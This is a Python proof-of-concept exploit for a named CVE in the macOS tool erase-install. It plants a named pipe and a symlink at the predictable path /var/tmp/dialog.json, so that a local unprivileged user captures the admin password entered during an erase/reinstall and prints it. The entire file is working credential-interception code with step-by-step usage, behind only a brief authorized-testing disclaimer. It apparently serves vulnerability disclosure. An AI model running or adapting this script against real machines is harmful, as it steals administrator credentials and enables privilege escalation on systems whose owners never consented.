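#!/usr/bin/env python3
"""
CVE-2025-70342: Credential Interception in erase-install

erase-install <= v40.4 writes swiftDialog credential output to the hardcoded
path /var/tmp/dialog.json. On Apple Silicon Macs, admin credentials entered
during erase/reinstall are written to this predictable location in a
world-writable directory. A local unprivileged attacker creates a named pipe
(FIFO) and a symlink at the target path to intercept the credentials in real
time.

Prerequisites:
  - Apple Silicon Mac (password prompt only happens on arm64)
  - Any local user account (no special privileges)
  - /var/tmp/dialog.json must not already exist as an entry owned by another
    user: /var/tmp is normally sticky-bit protected, so an unprivileged user
    can only replace entries it owns (or plant one where none exists yet).

Usage:
  python3 poc.py            # Create FIFO + symlink, wait for creds
  python3 poc.py --cleanup  # Remove the FIFO and symlink again

Attack:
  1. Run this script (creates FIFO + symlink, blocks waiting)
  2. Admin runs: sudo erase-install.sh --erase
  3. Admin enters password in swiftDialog prompt
  4. Password flows through FIFO, printed to stdout

Disclaimer: For educational and authorized security testing only. Only use on
systems you own or have explicit permission to test.
"""
import argparse
import os

# Path erase-install / swiftDialog writes the credential JSON to.
DIALOG_OUTPUT = "/var/tmp/dialog.json"
# Our named pipe; the symlink planted at DIALOG_OUTPUT points here.
FIFO_PATH = "/tmp/.dialog-fifo"

# Owner read/write, everyone else write-only. Whatever uid the victim process
# writes as (root via sudo, or presumably the console user if swiftDialog is
# launched as that user) can still open the pipe for writing, but nobody else
# on the box can open it for reading and race us for the captured output.
_FIFO_MODE = 0o622


def _remove_if_present(path: str) -> None:
    """Remove *path* whether it is a file, a FIFO or a (dangling) symlink.

    os.path.exists() follows symlinks and reports False for a dangling one, so
    a stale symlink left by an earlier run would survive and make the later
    mkfifo()/symlink() fail with FileExistsError. lexists() tests the entry
    itself.

    Raises:
        PermissionError: the entry exists but cannot be unlinked, typically
            because the directory is sticky and the entry belongs to another
            user (e.g. a root-owned dialog.json from a legitimate run).
    """
    if not os.path.lexists(path):
        return
    try:
        os.unlink(path)
    except PermissionError as err:
        raise PermissionError(
            f"cannot replace {path}: it exists and is not ours (sticky directory?)"
        ) from err


def watch(dialog_output: str = DIALOG_OUTPUT, fifo_path: str = FIFO_PATH) -> str:
    """Plant the FIFO + symlink, block until the victim writes, return the data.

    Args:
        dialog_output: path the victim process writes to; becomes the symlink.
        fifo_path: where the named pipe backing the symlink is created.

    Returns:
        Everything written into the pipe until the writer closes its end.

    Raises:
        PermissionError: an existing entry at either path could not be removed.
        OSError: mkfifo()/symlink() failed for another reason.
    """
    _remove_if_present(fifo_path)
    os.mkfifo(fifo_path, _FIFO_MODE)
    # mkfifo() applies the umask to the requested mode; set the bits explicitly.
    os.chmod(fifo_path, _FIFO_MODE)

    _remove_if_present(dialog_output)
    os.symlink(fifo_path, dialog_output)
    print(f"[+] FIFO: {fifo_path}")
    print(f"[+] Symlink: {dialog_output} -> {fifo_path}")
    print("[*] Waiting for credentials...")
    # open() blocks until a writer opens the other end; read() returns once the
    # writer closes it. A writer that keeps the file open would block us here.
    with open(fifo_path, "r") as fifo:
        data = fifo.read()
    print(f"[+] Captured:\n{data}")
    return data


def cleanup(dialog_output: str = DIALOG_OUTPUT, fifo_path: str = FIFO_PATH) -> None:
    """Undo watch(): remove the planted symlink and the FIFO if present.

    Only a *symlink* at dialog_output is removed, so a real file written there
    by a legitimate run is left untouched. Safe to call repeatedly.
    """
    if os.path.islink(dialog_output):
        os.unlink(dialog_output)
        print(f"[+] Removed: {dialog_output}")
    if os.path.lexists(fifo_path):
        os.unlink(fifo_path)
        print(f"[+] Removed: {fifo_path}")


def main() -> None:
    """CLI entry point: ``--cleanup`` removes the artefacts, otherwise watch()."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-70342: erase-install credential interception PoC"
    )
    parser.add_argument(
        "--cleanup", action="store_true", help="Remove FIFO and symlink"
    )
    parser.add_argument(
        "--dialog-output",
        default=DIALOG_OUTPUT,
        help=f"path the victim process writes to (default: {DIALOG_OUTPUT})",
    )
    parser.add_argument(
        "--fifo",
        default=FIFO_PATH,
        help=f"where to create the named pipe (default: {FIFO_PATH})",
    )
    args = parser.parse_args()
    if args.cleanup:
        cleanup(args.dialog_output, args.fifo)
    else:
        watch(args.dialog_output, args.fifo)


if __name__ == "__main__":
    main()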